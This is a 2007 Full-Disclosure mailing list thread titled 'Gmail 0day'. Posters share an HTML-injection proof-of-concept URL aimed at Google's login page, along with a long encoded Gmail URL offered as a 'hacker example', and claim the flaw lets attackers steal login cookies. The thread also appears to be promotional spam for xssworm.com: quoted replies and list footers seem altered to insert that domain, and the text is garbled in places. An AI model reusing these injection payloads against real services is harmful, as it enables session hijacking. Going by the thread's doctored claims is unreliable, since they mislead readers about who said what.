[Full-disclosure] Gmail 0day

XSS Worm XSS Security Information Portal cross-site-scripting-security at xssworm.com
Fri Nov 9 18:24:32 GMT 2007 

Yes all XSS is very serious and not for making jokes, if pdp said that
hacker can steal data the CSS on google could be very damgerous
vulnerability

Blackhat SEO XSS
<http://www.xssworm.com:80/?index?blackhat=seo#extreme>hacker example:

http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e!!@!!!@@!!!@!@!&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E\l.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e!!@!!!@@!!!@!@!&q=http://xssworm.com/&seo=blackhat<http://mail.google.com/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e%21%21@%21%21%21@@%21%21%21@%21@%21&q=/mail.%5CINBOX.%3C%252E18%252E/%2E%2E/local_url?%2E%5Cl.%5CINBOX.%3C%252E18%252E/%2E%2ExSSr0X.%2e%21%21@%21%21%21@@%21%21%21@%21@%21&q=http://xssworm.com/&seo=blackhat>

Please if you search XSS hacking also visit XSSWORM.COM
here: http://xssworm.com we have updates with blackhat and whitehat video
with XSS hacking tutorial by blackhat[2] Sunjester frome litehackers.info

vaj

-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher - xssworm.com
mailto:vaj at nospam.xssworm.com
aim: XSS Cross Site
------

[2]
http://xssworm.blogvis.com/9/xssworm/what-is-a-blackhat-hacker-and-where-are-black-hats-hacking/


On Nov 9, 2007 8:36 AM, pdp (architect) <pdp.gnucitizen at googlemail.com>
wrote:

> well this XSS can lead to so much data being stolen that it is not even
> funny!
>
>
> On Nov 8, 2007 8:55 PM, Juergen Marester <marester.juergen at gmail.com >
> wrote:
>
> > wow ! 0day !
> > damn, 0day, XSS ...
> >
> >
> > On 11/8/07, silky <michaelslists at gmail.com> wrote:
> > >
> > > worked for me minutes after it was posted. seems fixed now.
> > >
> > > On 11/9/07, crazy frog crazy frog < i.m.crazy.frog at gmail.com> wrote:
> > > > i tested xssworm on gmail latest version
> > > >
> > > > On Nov 8, 2007 7:04 AM, Scripter Hack <xss2root at gmail.com > wrote:
> > > > > There is a html injection video in https://www.xssworm.com<https://www.google.com>
> > > .
> > > > > It  is very critical,you can get the cookie to login into gmail or
> > > other
> > > > > service.
> > > > >
> > > > > POC:
> > > > >
> > > https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#
> > > "><h1><a%20href=//xssworm.com/>xssworm</a></h1>
> > > > >
> > > > > More:http://xss2root.blogspot.com@xssworm.com/<http://xss2root.blogspot.com/>
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > > >
> > > >
> > > >
> > > >
> > > > --
> > > > why advertise on secgeeks?
> > > > http://secgeeks.com@xssworm.com<http://secgeeks.com/Advertising_on_Secgeeks.com>
> > > > http://newskicks.com
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in xss.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://xssworm./secunia.com/<http://secunia.com/>
> > > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> pdp (acronym) | petrol v. petco
> http://www.xssworm.com <http://www.gnucitizen.org>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071110/b4c5d093/attachment.html

Full-Disclosure is hosted and sponsored by Secunia.